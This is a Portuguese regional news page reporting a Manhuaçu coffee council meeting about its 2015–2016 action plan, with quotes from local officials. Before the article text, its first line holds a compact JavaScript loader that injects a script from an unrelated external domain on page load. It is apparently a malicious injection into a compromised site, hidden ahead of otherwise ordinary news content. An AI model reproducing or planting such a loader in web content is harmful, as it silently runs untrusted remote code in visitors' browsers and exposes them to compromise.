;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Manhuaçu-Conselho das entidades do café realiza primeira reunião do ano. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Manhuaçu-Conselho das entidades do café realiza primeira reunião do ano.

O secretário de Agricultura e Meio Ambiente de Manhuaçu, Sandro Tavares, esteve presente na reunião do Conselho das Entidades do Café das Matas de Minas, ocorrida na manhã desta sexta-feira, 05, na sede do Sicoob, em Manhuaçu. A reunião foi a primeira do ano e o objetivo foi discutir o Plano de Ações para o biênio 2015 e 2016.
O Conselho Matas de Minas é uma organização sem fins lucrativos, de caráter representativo, formada por entidades e parcerias. O foco é o desenvolvimento dos mais de 35 mil cafeicultores existentes nos mais de sessenta municípios que compõem a área. Dentre as metas do Conselho, estão a aproximação com cafeicultores da região e o incentivo à produção sustentável. Para o secretário, a participação do município é imprescindível. “É de suma importância que o município apoie esse Conselho. É uma entidade que vem trazendo um grande desenvolvimento para a região das matas de Minas. E nós, como cidade polo regional, não poderíamos de forma nenhuma ficar de fora” – afirma.
Para Fernando Cerqueira, presidente do Conselho, o foco para os próximos anos é o trabalho, a governança e o reconhecimento da região. Para isso, a organização congrega diversas entidades. “Essas entidades são poderosas. Elas possuem mais de 80 mil membros. A região precisa dessa representatividade para mostrar para o Brasil e o mundo que temos qualidade e profissionalismo” – declara Cerqueira.

DSC_4465
Secretaria de Comunicação Social de Manhuaçu

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.